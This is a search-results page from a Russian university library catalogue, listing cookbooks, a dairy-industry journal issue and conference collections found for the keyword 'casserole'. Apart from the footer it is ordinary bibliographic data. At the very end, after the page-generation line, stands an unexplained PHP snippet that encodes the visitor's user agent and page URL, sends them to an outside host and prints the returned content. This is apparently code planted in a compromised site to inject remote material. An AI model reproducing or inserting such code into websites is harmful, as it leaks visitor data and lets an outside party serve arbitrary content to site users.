Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

60 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=ЗАПЕКАНКА")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 10
1. 
Микроволновая кухня каждый день [Текст] / сост. Ю. Р. Васильев ; дар. И. Ю. Морозов, 1995. - 383 с.
Держатели документа (Информация об экземплярах) 
2. 
Кулинарные рецепты: Из "Книги о вкусной и здоровой пище" [Текст] / сост. Л. И. Воробьева ; дар.: Л. К. Жарина, Л. К. Жарина, 1988. - 334, [1] с.
Ключевые слова 
ЗАКУСКА -- БУТЕРБРОД -- САЛАТ -- ИКРА -- ПАШТЕТ -- СОУС -- МАЙОНЕЗ -- БУЛЬОН -- СУП -- ОКРОШКА -- МЯСО -- КОТЛЕТА -- ТЕФТЕЛИ -- ШНИЦЕЛЬ -- ПЕЛЬМЕНИ -- КУРИЦА -- ДИЧЬ -- РЫБА -- МОРЕПРОДУКТ -- ТВОРОЖНИКИ -- ВАРЕНИК -- БЛИНЧИКИ -- ЗАПЕКАНКА -- ПУДИНГ -- ОМЛЕТ -- ОВОЩИ -- ГРИБЫ -- КАРТОФЕЛЬ -- ФОРШМАК -- КАША -- ПЛОВ -- КЛЕЦКИ -- ЧЕБУРЕК -- КУКУРУЗА -- ФАСОЛЬ -- ГОРОХ -- ЧЕЧЕВИЦА -- ПИРОЖОК -- ВАТРУШКА -- БУЛКА -- ОЛАДЬИ -- РУЛЕТ -- ПИРОЖНОЕ -- ТОРТ -- КЕКС -- ПОНЧИК -- ХВОРОСТ -- КИСЕЛЬ -- КОМПОТ -- ЖЕЛЕ -- МУСС -- КРЕМ -- ПУДИНГ -- ШАРЛОТКА -- МАРИНАД -- СОЛЕНЬЕ -- МАРИНАД -- КОНСЕРВИРОВАНИЕ -- ЗАМОРАЖИВАНИЕ -- ЯГОДЫ
Держатели документа (Информация об экземплярах) 
3. 
Рыбные блюда [Текст] / дар. В. А. Козлова, 1996. - 415 с.
Держатели документа (Информация об экземплярах) 
4. 
Молочная промышленность. - Журнал, 2010г. № 7
Оглавление 
  • Радаева, И. А. Ведущие ученые отрасли: Богданов Вячеслав Михайлович / И. А. Радаева. - с.80
  • К юбилею ведущего маслодела России. - с.74-75
  • Дунченко, Н. И. Научно-исследовательская работа - одна из основных составляющих подготовки магистров / Н. И. Дунченко, Л. В. Калинина, А. В. Ионов. - с.72-73
  • Пасько, О. В. Социальная значимость и экономическая эффективность технологий ферментированных продуктов / О. В. Пасько. - с.70-71
  • Быстрозамороженная творожная запеканка. - с.69
  • Степанов, К. М. Якутские национальные кисломолочные продукты нового поколения / К. М. Степанов, В. Т. Васильева. - с.68
  • Глаголева, Л. Э. Формы связи влаги в продуктах на творожной основе / Л. Э. Глаголева, Н. Ю. Черноусова, Л. С. Просвирина. - с.66-67
  • Количество в кефире полисахарида, производимого молочнокислыми бактериями. - с.64-65
  • Ермолаев, В. А. Вакуумное концентрирование молочно-белковых продуктов / В. А. Ермолаев. - с.62-63
  • Красноштанова, А. А. Молекулярное распределение белков при ультраконцентрировании сыворотки / А. А. Красноштанова, В. Г. Попов, О. В. Рытченкова. - с.60-61
  • Гиринович, О. А. Семинар "ЭФКО": фокус на творожную продукцию / О. А. Гиринович. - с.58-59
  • Смирнова, И. А. Молочно-белковый концентрат / И. А. Смирнова, В. Н. Печерина. - с.57
  • Мельникова, Е. И. Имитатор молочного жира для синбиотических продуктов / Е. И. Мельникова, Е. Б. Станиславская, Н. А. Подгорный. - с.55-56
  • Куликова, И. К. Кисломолочный напиток смешанного брожения / И. К. Куликова, И. А. Евдокимов, М. А. Гашева. - с.53-54
  • Тагатозосодержащий подсластитель. - с.52
  • Кравченко, Э. Ф. Белковые структурообразователи - загустители / Э. Ф. Кравченко, В. П. Захлестных. - с.51
  • Евелева, В. В. Добавки для йогурта / В. В. Евелева, А. Л. Рублев, Л. А. Забодалова. - с.48-50
  • Соколенко, Г. Г. Сывороточный квас с экстрактом амаранта / Г. Г. Соколенко, К. К. Полянский, Т. В. Вострикова. - с.46-47
  • Электродиализные установки для переработки молочной сыворотки. - с.45
  • Бурцев, Д. Г. Концентрат "КПС - лакт" / Д. Г. Бурцев, А. Д. Лодыгин. - с.44
  • Бурцев, Д. Г. Бифидогенный концентрат "Лактобел" / Д. Г. Бурцев, В. Н. Чернобаев. - с.43
  • Дудникова, О. А. Липидно-белковый концентрат / О. А. Дудникова, А. Д. Лодыгин, А. Г. Храмцов. - с.42-43
  • Храмцов, А. Г. Модернизация молочного дела: продвижение инновационных приоритетов / А. Г. Храмцов. - с.38-41
  • Комментарии к Типовой технологической инструкции по стандарту на молоко и сливки сгущенные с сахаром. - с.34-36
  • Пасько, О. В. Активизация роста и защиты культур с пробиотическими свойствами / О. В. Пасько. - с.31-32
  • Арсеньева, Т. П. К чему приводит лактазная недостаточность / Т. П. Арсеньева. - с.28-30
  • Хамагаева, И. С. Внеклкеточные метаболиты, синтезируемые пробиотическими микроорганизмами / И. С. Хамагаева, С. Б. Тумунова, Н. А. Замбалова. - с.27
  • Влияние лактитола на сквашивание и антагонистическую активность молочнокислых микроорганизмов. - с.24-26
  • Производители "Бифилайф" - лидеры молочной промышленности. - с.23
  • Ефимочкина, Н. Р. Возбудители пищевых зоонозов / Н. Р. Ефимочкина. - с.20-22
  • В помощь микробиологу. - с.18
  • Миллер, М. "Прозрачное молоко" на предприятии TNUVA / М. Миллер, М. Полыновская. - с.16-17
  • Имидж розничных сетей России глазами покупателей. - с.13-14
  • Быковская, Г. В. Как можно стабилизировать цены на молоко / Г. В. Быковская. - с.9-12
  • Потенциальные возможности и перспективы развития рынка молока и молочных продуктов в России. - с.6-8
Держатели документа (Информация об экземплярах) 
5. 
Наука XXI века: тенденции и перспективы [Текст] / ред. А. И. Барановский, 2015. - 198 с.
Оглавление 
  • Блинов, О. А. Опыт развития агротуристической деятельности в районах Омской области / О. А. Блинов, Д. С. Нардин, С. А. Нардина. - с.3-7
    Кл. слова: ОМСКАЯ ОБЛАСТЬ - ТУРИЗМ, АГРОТУРИЗМ
  • Блинов, О. А. Организация финансового менеджмента на предприятиях агропромышленного комплекса / О. А. Блинов, А. В. Гаврилова. - с.7-12
    Кл. слова: МЕНЕДЖМЕНТ ФИНАНСОВЫЙ, КОМПЛЕКС АГРОПРОМЫШЛЕННЫЙ
  • Боровских, Н. В. Структура и особенности функционирования рынка молока / Н. В. Боровских, С. В. Боровских. - с.12-16
    Кл. слова: РЫНОК МОЛОКА, МОЛОКО - СПРОС, МОЛОКО - ПРЕДЛОЖЕНИЕ
  • Герасимова, Н. О. Особенности развития продовольственного рынка как элемента современной экономической системы / Н. О. Герасимова, Л. А. Кочемайкина. - с.17-
    Кл. слова: СИСТЕМА ЭКОНОМИЧЕСКАЯ, РЫНОК ПРОДОВОЛЬСТВЕННЫЙ, РЕГУЛИРОВАНИЕ ПРОДОВОЛЬСТВЕННОГО РЫНКА
  • Глебова, Н. М. Определение конкурентных преимуществ вуза с учетом предпочтений потребителей / Н. М. Глебова, Е. Е. Грязнова. - с.21-27
    Кл. слова: УСЛУГА ОБРАЗОВАТЕЛЬНАЯ, КОММУНИКАЦИИ МАРКЕТИНГОВЫЕ, ВУЗ - КОНКУРЕНЦИЯ
  • Губанова, Е. В. Исследование регионального рынка труда на примере Калужской области / Е. В. Губанова. - с.28-34
    Кл. слова: РЫНОК ТРУДА РЕГИОНАЛЬНЫЙ, БЕЗРАБОТИЦА, КАЛУЖСКАЯ ОБЛАСТЬ
  • Ермакова, Н. С. К вопросу о нематериальном стимулировании персонала / Н. С. Ермакова, О. А. Якуб, Е. А. Обвинцева. - с.34-42
    Кл. слова: СТИМУЛИРОВАНИЕ ПЕРСОНАЛА, СТИМУЛИРОВАНИЕ НЕМАТЕРИАЛЬНОЕ, ПЕРСОНАЛ
  • Иванова, Н. Г. Повышение активности контрольных мероприятий по учету расчетов с персоналом по оплате труда в бюджетных организациях / Н. Г. Иванова, С. А. Мороз, Т. А. Головина. - с.42-48
    Кл. слова: ОПЛАТА ТРУДА - БЮДЖЕТНАЯ СФЕРА, АУТСОРСИНГ, КО-СОРСИНГ
  • Иккерт, А. В. Совершенствование учета основных средств на примере ЗАО "Первомайское" Омского района Омской области / А. В. Иккерт, Ю. И. Новиков. - с.50-53
    Кл. слова: СРЕДСТВА ОСНОВНЫЕ, ЗАО ПЕРВОМАЙСКОЕ, ФОНД ОСНОВНОЙ
  • Казначеева, Е. М. Система штрафов и доплат как элемент воздействия на результаты работы персонала организации / Е. М. Казначеева. - с.186-192
    Кл. слова: ПЕРСОНАЛ ОРГАНИЗАЦИИ, САНКЦИИ ШТРАФНЫЕ, ДОПЛАТА
  • Кислицын, В. Г. Учет загрузки производственных мощностей как способ снизить роль неявных факторов в статистическом анализе источников / В. Г. Кислицын. - с.57-63
    Кл. слова: МОЩНОСТЬ ПРОИЗВОДСТВЕННАЯ, АНАЛИЗ СТАТИСТИЧЕСКИЙ, УЧЕТ ПРОИЗВОДСТВЕННЫХ МОЩНОСТЕЙ
  • Кислицына, Т. Ф. Электронный документооборот - высокотехнологичный и прогрессивный подход к существенному повышению эффективности работы организации / Т. Ф. Кислицына, Л. В. Лукашевич. - с.64-73
    Кл. слова: ДОКУМЕНТООБОРОТ ЭЛЕКТРОННЫЙ, ПРОДУКТ ПРОГРАММНЫЙ, ЭФФЕКТИВНОСТЬ ПРОИЗВОДСТВА
  • Лалова, Е. Ю. Человеческий капитал и производительность труда работников как объект управления персоналом / Е. Ю. Лалова, Л. Н. Иванова. - с.73-78
    Кл. слова: КАПИТАЛ ЧЕЛОВЕЧЕСКИЙ, ПРОИЗВОДИТЕЛЬНОСТЬ ТРУДА, УПРАВЛЕНИЕ ПЕРСОНАЛОМ
  • Литвякова, Ю. С. Организация аудиторской проверки основных средств на примере ООО "Солярное" Черлакского района Омской области / Ю. С. Литвякова. - с.78-82
    Кл. слова: ПРОВЕРКА АУДИТОРСКАЯ, СРЕДСТВА ОСНОВНЫЕ
  • Литвякова, Ю. С. Организация бухгалтерского учета основных средств на примере ООО "Солярное" Черлакского района Омской области / Ю. С. Литвякова. - с.78-82
    Кл. слова: УЧЕТ БУХГАЛТЕРСКИЙ, СРЕДСТВА ОСНОВНЫЕ
  • Мамонтов, С. А. Обобщенные результаты исследования потребительского рынка города Омска / С. А. Мамонтов, Ю. В. Шляпина
    Кл. слова: РЫНОК ПОТРЕБИТЕЛЬСКИЙ, ИССЛЕДОВАНИЕ МАРКЕТИНГОВОЕ, ОМСК - ТОРГОВЛЯ
  • Маслова, Л. И. О некоторых аспектах экономических отношений в сфере высшего профессионального образования Кыргызстана / Л. И. Маслова. - с.98-102
    Кл. слова: КЫРГЫЗСТАН - ОБРАЗОВАНИЕ
  • Новиков, Ю. И. Повышение конкурентоспособности зернового производства в системе обеспечения продовольственной безопасности / Ю. И. Новиков. - с.102-105
    Кл. слова: БЕЗОПАСНОСТЬ ПРОДОВОЛЬСТВЕННАЯ, ПРОИЗВОДСТВО ЗЕРНОВОЕ
  • Новиков, Ю. И. Учет кредитов и займов в ТОО "Совет-СК", Республика Казахстан / Ю. И. Новиков, В. А. Штрикер. - с.106-109
    Кл. слова: ФОНДОЕМКОСТЬ, ЗАЙМ, КРЕДИТ
  • Рожина, Е. Ю. Современные концепции оценки социально-экономической эффективности деятельности рыночных субъектов / Е. Ю. Рожина, Т. Б. Дороболюк, С. И. Ускова. - с.110-119
  • Турдалы, Н. О. Актуальные вопросы конкурентоспособности регионов Республики Казахстан / Н. О. Турдалы, А. Н. Турдалы, Ж. Н. Турдалы. - с.119-132
    Кл. слова: КАЗАХСТАН - РЕГИОНЫ, КАЗАХСТАН - ЭКОНОМИКА
  • Турдалы, Н. О. Инфраструктура поддержки малого предпринимательства в Республике Казахстан / Н. О. Турдалы, А. Е. Шахарова. - с.132-144
    Кл. слова: КАЗАХСТАН - ПРЕДПРИНИМАТЕЛЬСТВО
  • Чуракова, Т. Б. Анализ и перспективы развития потребительского рынка города Омска в 2015 году / Т. Б. Чуракова, В. А. Пинко. - с.145-150
    Кл. слова: РЫНОК ПОТРЕБИТЕЛЬСКИЙ, ОМСК - БИЗНЕС
  • Шагланов, А. Н. Инвестиционный климат в России: проблемы и перспективы / А. Н. Шагланов. - с.150-155
    Кл. слова: ИНВЕСТИЦИИ - РОССИЯ, ДЕЯТЕЛЬНОСТЬ ИНВЕСТИЦИОННАЯ
  • Шеремета, С. В. Процесс управления активами кредитной организации / С. В. Шеремета, И. Н. Шадрина. - с.155-160
    Кл. слова: ОРГАНИЗАЦИЯ КРЕДИТНАЯ, АКТИВ БАНКА, УПРАВЛЕНИЕ АКТИВАМИ
  • Эрлих, А. Е. Особенности взаимодействия предприятий общественного питания / А. Е. Эрлих, Н. В. Бобкова, Е. Н. Клок. - с.160-164
    Кл. слова: ПИТАНИЕ ОБЩЕСТВЕННОЕ, ВЗАИМОДЕЙСТВИЕ ПРЕДПРИЯТИЙ
  • Беспалова, Т. А. Современные методы дезинфекции при казеозном лимфадените / Т. А. Беспалова, О. А. Приступа, А. В. Шадрин. - с.165-170
    Кл. слова: ДЕЗИНФЕКЦИЯ, ЛИМФАДЕНИТ, ЗАБОЛЕВАНИЕ ИНФЕКЦИОННОЕ
  • Бураковская, Н. В. Инновационные технологии в организации школьного питания / Н. В. Бураковская. - с.170-172
    Кл. слова: ПИТАНИЕ ШКОЛЬНИКОВ, РАЦИОН СБАЛАНСИРОВАННЫЙ, ТЕХНОЛОГИИ ИННОВАЦИОННЫЕ
  • Германская, Л. Г. Молокосодержащие продукты как системообразующий фактор здорового питания / Л. Г. Германская, Н. А. Бенгардт, Л. М. Завгородняя. - с.172-175
    Кл. слова: ПРОДУКТЫ МОЛОКОСОДЕРЖАЩИЕ, ПИТАНИЕ ЗДОРОВОЕ
  • Есипова, М. С. Инновационные технологии в производстве творожных продуктов / М. С. Есипова, М. О. Индычий. - с.176-181
    Кл. слова: ТВОРОГ, ПРОДУКТ ТВОРОЖНЫЙ, ТЕХНОЛОГИИ ИННОВАЦИОННЫЕ
  • Каня, И. П. Салатные застолья / И. П. Каня. - с.181-188
    Кл. слова: САЛАТЫ, СОВМЕСТИМОСТЬ ПРОДУКТОВ, МАЙОНЕЗ
  • Лемешева, Е. Р. Анализ пищевой ценности овощной запеканки с творогом для организации питания детей школьного возраста / Е. Р. Лемешева. - с.188-193
    Кл. слова: ЗАПЕКАНКА ОВОЩНАЯ, ПИТАНИЕ ШКОЛЬНИКОВ, ТВОРОГ
  • Шадрин, М. А. Культура потребления пищевых продуктов / М. А. Шадрин [и др.]
    Другие авторы: Тарасов Р. М., Жданеева Н. П., Галкина С. Л.
    Кл. слова: КУЛЬТУРА ПИТАНИЯ
Держатели документа (Информация об экземплярах) 
6. 
Сборник рецептур блюд и кулинарных изделий для предприятий общественного питания [Текст] / сост.: Л. Е. Голунова, М. Т. Лабзина, 2014. - 771 с.
Ключевые слова 
БУТЕРБРОД -- ЗАКУСКА БАНКЕТНАЯ -- САЛАТ -- ВИНЕГРЕТ -- СУП -- БОРЩ -- ЩИ -- РАССОЛЬНИК -- СОЛЯНКА -- СУП МОЛОЧНЫЙ -- СУП - ПЮРЕ -- СУП ХОЛОДНЫЙ -- БЛЮДА ИЗ КАРТОФЕЛЯ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ КРУП -- КАША -- ЗАПЕКАНКА -- ПУДИНГ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА РЫБНЫЕ -- БЛЮДА ИЗ МОРЕПРОДУКТОВ -- БЛЮДА МЯСНЫЕ -- ГАРНИР -- СОУС -- БЛЮДА СЛАДКИЕ -- ЯГОДЫ -- КОМПОТ -- КИСЕЛЬ -- ЖЕЛЕ -- МУСС -- САМБУК -- КРЕМ -- СЛИВКИ ВЗБИТЫЕ -- СУФЛЕ -- ПУДИНГ -- МОРОЖЕНОЕ -- НАПИТКИ -- ЧАЙ -- КОФЕ -- КАКАО -- ШОКОЛАД -- МОЛОКО -- КОКТЕЙЛЬ -- КРЮШОН -- БЛЮДА МУЧНЫЕ -- ФАРШ -- РАСХОД СЫРЬЯ -- ПОЛУФАБРИКАТЫ -- ВЗАИМОЗАМЕНЯЕМОСТЬ ПРОДУКТОВ
Держатели документа (Информация об экземплярах) 
7. 
Сидорина Е. И. Современная кухня [Текст] : кулинар. рецепты из доступ. продуктов / Е. И. Сидорина, 1993. - 543 с.
Ключевые слова 
СЕРВИРОВКА СТОЛА -- ЗАКУСКА ХОЛОДНАЯ -- САЛАТ -- ВИНЕГРЕТ -- ПАШТЕТ -- ЗАЛИВНОЕ -- БУТЕРБРОД -- БЛЮДА МЯСНЫЕ -- БЛЮДА ИЗ РЫБЫ -- СЫР -- БЛЮДА ИЗ ЯИЦ -- СУП -- БОРЩ -- ЩИ -- РАССОЛЬНИК -- СУП ОВОЩНОЙ -- УХА -- СУП МОЛОЧНЫЙ -- СУП ГРИБНОЙ -- БЛИНЫ -- ОЛАДЬИ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ БОБОВЫХ -- ЗАПЕКАНКА -- ПЛОВ -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ КАРТОФЕЛЯ -- СОУС -- ТЕСТО ДРОЖЖЕВОЕ -- ТЕСТО СЛОЕНОЕ -- ТОРТЫ -- ТЕСТО БИСКВИТНОЕ -- ПЕЧЕНЬЕ -- ХВОРОСТ -- ВАФЛИ -- КЕКС -- ПИРОГ -- КРЕМ МАСЛЯНЫЙ -- КРЕМ БЕЛКОВЫЙ -- КРЕМ ЗАВАРНОЙ -- МУСС -- ЖЕЛЕ -- КОМПОТ -- КИСЕЛЬ -- БЛЮДА СЛАДКИЕ -- ЗАГОТОВКИ -- КАПУСТА КВАШЕНАЯ -- КОНСЕРВИРОВАНИЕ -- МАРИНОВАНИЕ -- ВАРЕНЬЕ -- ДЖЕМ -- ЦУКАТЫ
8. 
Научный потенциал молодежи: состояние, проблемы, перспективы исследований [Текст] / ред. А. И. Барановский, 2014. - 323 с.
Оглавление 
  • Свиридова, А. В. Административная классическая школа управления / А. В. Свиридова. - с.10-33
    Кл. слова: ШКОЛА УПРАВЛЕНИЯ КЛАССИЧЕСКАЯ, ШКОЛА АДМИНИСТРАТИВНОГО УПРАВЛЕНИЯ, ВОСТОЧНЫЙ ЭКСПРЕСС БАНК
  • Крапивина, Л. С. Стимулирование сбыта мороженого среди молодежи / Л. С. Крапивина, К. С. Сухинина. - с.34-64
    Кл. слова: ПРОДАЖА МОРОЖЕНОГО, РЕКЛАМА - МОЛОДЕЖЬ
  • Шивякова, К. В. Совершенствование системы организации рабочих мест в ОАО "Называевский" / К. В. Шивякова. - с.65-114
    Кл. слова: МЕСТО РАБОЧЕЕ
  • Кравченко, К. И. Продвижение бренда на рынке услуг связи с использованием приемов партизанского маркетинга / К. И. Кравченко. - с.115-145
    Кл. слова: УСЛУГА СВЯЗИ, РЫНОК УСЛУГ, ПРОДВИЖЕНИЕ БРЕНДА
  • Женченко, И. В. Эффективность использования рабочего времени руководителя / И. В. Женченко. - с.146-177
    Кл. слова: ВРЕМЯ РАБОЧЕЕ, РУКОВОДИТЕЛЬ ОРГАНИЗАЦИИ
  • Максимов, Д. В. Потребительское кредитование / Д. В. Максимов. - с.177-206
    Кл. слова: КРЕДИТОВАНИЕ ПОТРЕБИТЕЛЬСКОЕ
  • Лемишева, Е. Р. Разработка технологии овощной запеканки с творогом для питания детей школьного возраста / Е. Р. Лемишева. - с.208-251
    Кл. слова: ЗАПЕКАНКА ОВОЩНАЯ, ПИТАНИЕ ШКОЛЬНИКОВ
  • Горохова, Е. А. Электронная торговля / Е. А. Горохова. - с.252-272
    Кл. слова: ТОРГОВЛЯ ЭЛЕКТРОННАЯ
  • Свиридова, А. В. Применение информационных технологий при решении задач / А. В. Свиридова. - с.273-303
    Кл. слова: ТЕХНОЛОГИИ ИНФОРМАЦИОННЫЕ, РЕШЕНИЕ ЗАДАЧ, ЗАДАЧА
  • Гаврилова, Ю. А. Экологические аспекты использования энергосберегающих ламп / Ю. А. Гаврилова, А. А. Бродникова. - с.304-322
    Кл. слова: ЛАМПА ЭНЕРГОСБЕРЕГАЮЩАЯ
Держатели документа (Информация об экземплярах) 
9. 
Сборник рецептур блюд и кулинарных изделий для предприятий общественного питания [Текст] / сост. Л. Е. Голунова, 2001. - 688 с.
Ключевые слова 
БУТЕРБРОД -- ЗАКУСКА БАНКЕТНАЯ -- САЛАТ -- ВИНЕГРЕТ -- СУП -- БОРЩ -- ЩИ -- РАССОЛЬНИК -- СОЛЯНКА -- СУП МОЛОЧНЫЙ -- СУП - ПЮРЕ -- СУП ХОЛОДНЫЙ -- БЛЮДА ИЗ КАРТОФЕЛЯ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ КРУП -- КАША -- ЗАПЕКАНКА -- ПУДИНГ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА РЫБНЫЕ -- БЛЮДА ИЗ МОРЕПРОДУКТОВ -- БЛЮДА МЯСНЫЕ -- ГАРНИР -- СОУС -- БЛЮДА СЛАДКИЕ -- ЯГОДЫ -- КОМПОТ -- КИСЕЛЬ -- ЖЕЛЕ -- МУСС -- САМБУК -- КРЕМ -- СЛИВКИ ВЗБИТЫЕ -- СУФЛЕ -- ПУДИНГ -- МОРОЖЕНОЕ -- НАПИТКИ -- ЧАЙ -- КОФЕ -- КАКАО -- ШОКОЛАД -- МОЛОКО -- КОКТЕЙЛЬ -- КРЮШОН -- БЛЮДА МУЧНЫЕ -- ФАРШ -- РАСХОД СЫРЬЯ -- ПОЛУФАБРИКАТЫ -- ВЗАИМОЗАМЕНЯЕМОСТЬ ПРОДУКТОВ
Держатели документа (Информация об экземплярах) 
10. 
Киселева, Вера Борисовна. Детская кухня [Текст] : Кн. для матерей о приготовлении пищи детям / В. Б. Киселева; В. С. Вайль, 1958. - 175 с.
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2960 - 18.07.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.82 с.14 запросов, 0.49c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;